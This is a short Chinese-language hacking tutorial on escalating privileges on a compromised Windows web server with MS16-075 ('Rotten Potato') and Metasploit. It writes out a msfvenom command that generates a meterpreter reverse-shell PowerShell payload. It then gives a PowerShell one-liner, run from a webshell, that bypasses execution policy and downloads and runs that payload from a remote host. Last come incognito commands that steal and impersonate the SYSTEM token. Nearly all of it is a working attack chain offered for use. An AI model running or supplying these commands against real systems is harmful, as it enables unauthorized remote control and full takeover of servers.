利用ms16-075配合MSF提权方法(烂土豆提权)

事因:偶遇护卫神,这php权限给弄的只有一点点了。N久没提权,手动扒扒,发现以前的提权方式都不行了。(这个方法目测还能坚持个一年半载的)

直接开始:
1.msfvenom 生成个powsershell 反弹后门:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxxx LPORT=9990 -f psh-reflection >> ps1.ps1

生成好之后丢到公网服务器

2.使用大马执行powershell下载刚刚生成的ps反弹msf的脚本:
powershell.exe -exec Bypass -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://xxxx/ps1.ps1')"

3.反弹到MSF之后开始使用MSF配合烂土豆提权:
> use incognito //这个模块是用来窃取/模仿令牌的,相当于web的cookie。win有两种令牌,交互登录创建的令牌(3389),非交互的模仿令牌。
> list_tokens -u //列出当前存在的令牌
> execute -cH -f [path.exe]
> impersonate_token “NT AUTHORITY\\SYSTEM” //模仿windows system令牌,有时候一次不会成功,多试几次。
> getuid //显示”Server username: NT AUTHORITY/SYSTEM” .End